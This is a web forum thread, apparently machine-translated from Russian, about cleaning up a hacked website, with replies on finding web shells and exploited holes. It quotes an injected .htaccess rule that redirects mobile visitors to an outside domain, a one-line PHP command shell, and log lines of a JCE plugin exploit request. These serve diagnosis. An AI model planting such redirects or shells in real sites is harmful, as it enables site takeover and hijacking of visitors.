Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
N
N
neopug2013-02-01 12:41:58
PHP
neopug, 2013-02-01 12:41:58

How do malware get to the site?

Good afternoon,
tell me how malware can get on the site?
Background - I received a letter from Yandex that my site may have been hacked. After a cursory analysis, I found this rubbish in .htacceess:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] RewriteRule (.*) http://id.nice-dns.ru/?18&source=oda.ua [L,R=302] # on
My authorization goes by keys, the ssh port is not standard. There are practically no foreign scripts (I confess, there is a glanders, but as I understand it, if it were her, then the floor of the Runet would have squealed). Somewhere from a couple of months ago there was a similar situation, but then authorization for ssh was by login / password and the session was recorded in winscp. I assumed that they just dangled my password and made malware, but it looks like the legs are growing from somewhere else.
Maybe there are some vulnerability scanners for adequate money? Or is it some kind of hole? Because on New Year's Eve, I did the samepolyana.ua/ , to which I have a relationship only as a client.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

5 answer(s)
Report
@
@sledopit, 2013-02-01
@neopug

As a rule, such garbage is distributed in two ways:
A. A hole in the site. is found by diligent reading of logs and search for shells.
quite recently, I helped a friend with a similar thing (iframes stuck on the resource). the procedure was something like this:

  1. comparison with backup and detection of changed / new files
  2. studying new files, of course, one of them turned out to be a shell ( .cache_rcnzyz.php )
    (if there are no backups, then SSZB should be looked for on standard shell functions (in the case of php, these are all sorts of shell_exec and base64 [it should be borne in mind that your code can also use them, so you need to look carefully])
  3. study of logs for access and filling of this shell. I had lines like this:
    xxx.xxx.xxx.xx - - [09/Jan/2013:18:09:46 +0400] "POST /images/stories/.cache_rcnzyz.php HTTP/1.0" 200 501 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

    unfortunately, the attacker turned out to be quite cautious and there were no other requests from this ip (which also turned out to be foreign, i.e. you won’t complain to the valiant police). the required hole was found by the time the file was created (+- a couple of minutes).
    zzz.zzz.zzz.zz - - [08/Jan/2013:00:02:21 +0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 200 668 "-" "BOT/0.1 (BOT for JCE)"
Hooray, the hole was found, the patch was made, the attacker was banned.
B. a person with ftp access to the resource picked up a trojan (I heard about ssh only once). Well, here you can change passwords and fix the infected machine.

Report
T
TyzhSysAdmin, 2013-02-01
@POS_troi

So you did not initially indicate that VDS;)
Still, look for shells in php (or whatever you have there) scripts, something like
<?php system($_GET["cmd"]); ?>
but most likely everything will be wrapped in base64, as a rule they immediately settle. You can check it simply by comparing all files with the standard, on several servers I run a comparison of MD5 sums daily.

Report
T
TyzhSysAdmin, 2013-02-01
@POS_troi

Not necessarily your account was hacked, the whole server could have been hacked - they got an administrative account.
Ideally, look at the server logs and look for how the file has been changed.
At the same time, look for the embedded shell in all files.

Report
P
pessom, 2013-02-01
@pessom

FTP up?

Report
C
charliez, 2013-02-01
@charliez

The site engine is not wordpress by any chance?

Similar questions
I
iamserge2017-07-12 03:30:54
Where can I find a normal WP description (add_action)? 3Reply
C
Citizen052017-07-26 12:36:31
Django admin/model_name/add/ throws “Page not found” error on cpanel? 1Reply
J
Jedi2017-08-04 22:16:13
How to set index folder via .htaccess? 5Reply
A
Andrey Andreev2015-09-09 14:44:08
Can't make a script that checks the current date on the server and adds +2 days to the number in the tag? 3Reply
I
Ivan Yakushenko2017-08-14 13:16:01
Does Kivy have functionality for working with geolocation? 4Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question